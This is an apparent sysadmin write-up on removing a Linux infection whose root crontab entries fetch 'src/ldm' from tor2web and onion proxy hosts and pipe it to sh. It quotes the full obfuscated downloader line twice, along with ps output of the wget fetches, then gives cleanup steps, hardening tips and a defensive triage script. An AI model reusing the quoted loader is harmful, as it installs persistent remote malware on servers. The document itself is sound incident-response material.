[Solved] an7kmd2wp4xo7hpr.tor2web.su Malicious Processes/Crons – Linux
1. Malicious Processes
A. Identify the processes and the hostname they contact; in the case below it is an7kmd2wp4xo7hpr.tor2web.su
B. Run ps aux; the relevant entries were:
root 26561 0.0 0.0 139556 4392 ? S Aug20 0:00 wget --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /etc/cron.monthly/cron
root 28777 0.0 0.0 139556 4384 ? S Aug21 0:00 wget --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /etc/cron.monthly/cron
root 24990 0.0 0.0 106076 1380 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d
root 24991 0.0 0.0 106076 1380 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d
root 24992 0.0 0.0 106076 1376 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d
2. Malicious Crons
A. Now grep the whole server for the same hostname.
B. The command and its output are below:
[[email protected] ~]# grep -rli an7kmd2wp4xo7hpr /
/etc/cron.d/root
/etc/cron.monthly/cronlog
/etc/crontab
[[email protected] ~]# cat /etc/cron.d/root
*/7 * * * * root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <[email protected]>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &
[[email protected] ~]# cat /etc/crontab
*/7 * * * * root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <[email protected]>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &
Solutions:-
A. Remove the malicious code from the crons (every file the grep listed, and anywhere else you find it) and, for the time being, make those files immutable with chattr as well (use chattr -i later when you need to edit them again).
B. chattr +i /etc/cron.d/root ; chattr +i /etc/crontab
C. Hardening steps:
- Change the root password immediately
- Remove all authorized keys that are not yours from every user:
ls -lahd /home/*/.ssh/auth*
ls -lahd /root/.ssh/auth*
- ClamAV - antivirus
- Maldet - malware detector
- Restrict SSH to particular IPs/VPN
- Restrict MySQL to particular IPs/VPN
- CSF firewall
- LFD login failure daemon
- WAF web application firewall
- ModSecurity with HTTP/Apache
- Avoid using the MySQL root user's password in application code; create a non-root MySQL user instead.
- Proper permissions and ownership on code files, e.g. 755 for directories and 644 for files.
- Non-standard SSH port
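As an added example (not code from the original post), the following POSIX sh script automates steps 1 and 2 and solutions A and C above: it lists processes and cron files that mention the indicator, copies each hit into a quarantine directory before stripping only the matching lines, and lists the authorized_keys files to review. The ROOT and QUARANTINE_DIR arguments are assumptions added so it can be pointed at a constructed copy of the tree; on a real host pass / and a directory outside the cron paths.

```shell
#!/bin/sh
# Added triage helper, not code from the original post. Indicator-based
# cleanup of the cron persistence described above; ROOT is an assumed
# argument (use / on the live system) so the functions also run against a
# constructed test tree.

# Step 1: running processes whose command line mentions the indicator ($1).
list_ioc_processes() {
    ps axo pid=,user=,args= 2>/dev/null | grep -i -- "$1" | grep -v grep || :
}

# Step 2: cron files below ROOT ($1) that mention the indicator ($2).
find_cron_hits() {
    grep -rli -- "$2" "$1/etc/crontab" "$1/etc/cron.d" "$1/etc/cron.hourly" \
        "$1/etc/cron.daily" "$1/etc/cron.weekly" "$1/etc/cron.monthly" \
        "$1/var/spool/cron" 2>/dev/null || :
}

# Solution A: copy the file ($1) into the quarantine dir ($3), which must lie
# outside the cron directories so cron never picks the backup up, then drop
# every line containing $2 in place (the inode and mode are kept).
# LOCK=1 additionally applies chattr +i as the post suggests (needs root).
strip_ioc_lines() {
    mkdir -p -- "$3"
    bak="$3/$(printf '%s' "$1" | tr / _)"
    cp -p -- "$1" "$bak"
    grep -vi -- "$2" "$bak" > "$1" || :   # exit 1 here only means nothing was left
    if [ "${LOCK:-0}" = 1 ]; then chattr +i "$1"; fi
}

# Solution C: authorized_keys files to inspect for keys that are not yours.
list_authorized_keys() {
    ls -lahd "$1"/root/.ssh/auth* "$1"/home/*/.ssh/auth* 2>/dev/null || :
}

# Usage: triage ROOT INDICATOR QUARANTINE_DIR   (cron paths contain no spaces)
triage() {
    echo "== processes mentioning $2 =="; list_ioc_processes "$2"
    for hit in $(find_cron_hits "$1" "$2"); do
        strip_ioc_lines "$hit" "$2" "$3"
        echo "cleaned: $hit (backup in $3)"
    done
    echo "== authorized_keys to review =="; list_authorized_keys "$1"
}

if [ "$#" -eq 3 ]; then triage "$@"; fi
```

Review the quarantined copies before deleting them; they are the evidence of what ran and when.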